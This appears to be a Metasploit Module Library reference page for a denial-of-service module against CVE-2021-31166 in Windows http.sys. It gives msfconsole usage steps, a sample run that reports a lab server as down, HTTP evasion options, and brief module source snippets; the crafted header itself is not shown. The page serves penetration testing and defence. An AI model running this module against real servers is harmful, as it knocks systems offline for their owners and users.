Windows IIS HTTP Protocol Stack DOS - Metasploit
This page contains detailed information about how to use the auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows IIS HTTP Protocol Stack DOS
Module: auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
Source code: modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb
Disclosure date: 2021-05-11
Last modification time: 2022-03-16 14:03:20 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2021-31166
This module exploits CVE-2021-31166, a UAF bug in http.sys when parsing specially crafted Accept-Encoding headers that was patched by Microsoft in May 2021, on vulnerable IIS servers. Successful exploitation will result in the target computer BSOD'ing before subsequently rebooting. Note that the target IIS server may or may not come back up, this depends on the target's settings as to whether IIS is configured to start on reboot.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect.
Reliability:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Stability:
- crash-os-restarts: Module may crash the OS, but the OS restarts.
Side Effects:
- screen-effects: Module may show something on the screen (Example: a window pops up).
Basic Usage
msf > use auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
msf auxiliary(http_sys_accept_encoding_dos_cve_2021_31166) > show targets
... a list of targets ...
msf auxiliary(http_sys_accept_encoding_dos_cve_2021_31166) > set TARGET target-id
msf auxiliary(http_sys_accept_encoding_dos_cve_2021_31166) > show options
... show and set options ...
msf auxiliary(http_sys_accept_encoding_dos_cve_2021_31166) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Windows 10 versions 2004 and 20H2, and Windows Server versions 2004 and 20H2, are affected when KB5003173 (the May 2021 update that addresses CVE-2021-31166) is not installed.
The vulnerability is a use-after-free (UAF) bug in the UlpParseContentCoding function of http.sys. The function appends items to a local LIST_ENTRY structure but does not NULL out that LIST_ENTRY after it has finished being used. An attacker can abuse this to trigger a code path that frees every entry of the local LIST_ENTRY structure, which is then linked into the Request object the function uses to handle the incoming request. The Request object is used later on in the code, so the freed entries are dereferenced again, resulting in the UAF.

Note that whilst this exploit targets IIS servers, in theory any component that uses http.sys could be vulnerable, including client programs which use http.sys to connect to servers.

The module uses this vulnerability to cause an invalid memory access exception in http.sys by sending a request with a specially crafted Accept-Encoding header to the target IIS server. Since http.sys is a kernel module, this results in a BSOD on the target system, so IIS goes down for a period of time until the server reboots and IIS restarts again (if it is configured to start on boot).
Verification Steps
- Start msfconsole
- use auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
- set RHOSTS <ip>
- exploit
- Verify that the target server is down.
Options
RHOSTS
- Required
- Type: address
- No default value
IP address or hostname of the target IIS server.
RPORT
- Required
- Type: integer
- Default value: 80
The port on the target server where IIS is listening.
TARGETURI
- Required
- Type: string
- Default value: /
The base URI of the IIS install on the target server.
Scenarios
Windows 10 20H2 Build 19042.685 With IIS Installed
~/git/metasploit-framework │ iis_dos_cve2022_21907 ?18 ./msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v6.1.34-dev-88b17b79fe ]
+ -- --=[ 2209 exploits - 1171 auxiliary - 395 post ]
+ -- --=[ 600 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: You can use help to view all
available commands
[*] Starting persistent handler(s)...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show options
Module options (auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the IIS Server.
VHOST no HTTP server virtual host
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > set RHOSTS 172.22.216.145
RHOSTS => 172.22.216.145
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > exploit
[*] Running module against 172.22.216.145
[*] Connecting to target to make sure its alive...
[+] Successfully connected to target. Sending payload...
[+] Payload was sent to the target server.
[*] Checking that the server is down...
[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) >
Msfconsole Usage
Here is how the dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 auxiliary module looks in the msfconsole:
msf6 > use auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show info
Name: Windows IIS HTTP Protocol Stack DOS
Module: auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2021-05-11
Provided by:
Max
Stefan Blair
Axel Souchet
Maurice LAMBERT <mauricelambert434[at]gmail.com>
Module side effects:
screen-effects
Module stability:
crash-os-restarts
Module reliability:
ioc-in-logs
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the IIS Server.
VHOST no HTTP server virtual host
Description:
This module exploits CVE-2021-31166, a UAF bug in http.sys when
parsing specially crafted Accept-Encoding headers that was patched
by Microsoft in May 2021, on vulnerable IIS servers. Successful
exploitation will result in the target computer BSOD'ing before
subsequently rebooting. Note that the target IIS server may or may
not come back up, this depends on the target's settings as to
whether IIS is configured to start on reboot.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-31166
https://github.com/mauricelambert/CVE-2021-31166
https://twitter.com/metr0/status/1392631376592076805
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166
Module Options
This is a complete list of options available in the dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 auxiliary module:
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show options
Module options (auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the IIS Server.
VHOST no HTTP server virtual host
Advanced Options
Here is a complete list of advanced options supported by the dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 auxiliary module:
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show advanced
Module advanced options (auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 module can do:
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show actions
Auxiliary actions:
Name Description
---- -----------
(none: this module defines no auxiliary actions)
Evasion Options
Here is the full list of possible evasion options supported by the dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Error Messages
This module may fail with the following error messages.
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
<PEER> - Could not connect to the target IIS server - no response
Here is a relevant code snippet related to the "<PEER> - Could not connect to the target IIS server - no response" error message:
  'uri' => normalize_uri(target_uri.path, ''),
  'method' => 'GET'
)

if res.nil?
  fail_with(Failure::Unreachable, "#{peer} - Could not connect to the target IIS server - no response")
end

print_good('Successfully connected to target. Sending payload...')

payload =
Target appears to still be alive. It may have not received the packet due to network filtering, or it may not be vulnerable.
Here is a relevant code snippet related to the "Target appears to still be alive. It may have not received the packet due to network filtering, or it may not be vulnerable." error message:
  )

  if res.nil?
    print_good('Target is down.')
  else
    print_error('Target appears to still be alive. It may have not received the packet due to network filtering, or it may not be vulnerable.')
  end
rescue Rex::ConnectionError, Errno::ECONNRESET
  print_good('Target is down.')
end
end
References
- CVE-2021-31166
- https://nvd.nist.gov/vuln/detail/CVE-2021-31166
- https://github.com/mauricelambert/CVE-2021-31166
- https://twitter.com/metr0/status/1392631376592076805
- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166
See Also
Check also the following modules related to this module:
- auxiliary/dos/windows/http/ms10_065_ii6_asp_dos
- auxiliary/dos/windows/http/pi3web_isapi
- auxiliary/fuzzers/http/http_form_field
- auxiliary/fuzzers/http/http_get_uri_long
- auxiliary/fuzzers/http/http_get_uri_strings
- auxiliary/gather/http_pdf_authors
- auxiliary/scanner/http/http_header
- auxiliary/scanner/http/http_hsts
- auxiliary/scanner/http/http_login
- auxiliary/scanner/http/http_put
- auxiliary/scanner/http/http_sickrage_password_leak
- auxiliary/scanner/http/http_traversal
- auxiliary/scanner/http/http_version
- auxiliary/server/capture/http_basic
- auxiliary/server/capture/http_javascript_keylogger
- auxiliary/server/capture/http_ntlm
- auxiliary/server/http_ntlmrelay
Authors
- Max
- Stefan Blair
- Axel Souchet
- Maurice LAMBERT <mauricelambert434[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.1.36-dev. For more modules, visit the Metasploit Module Library.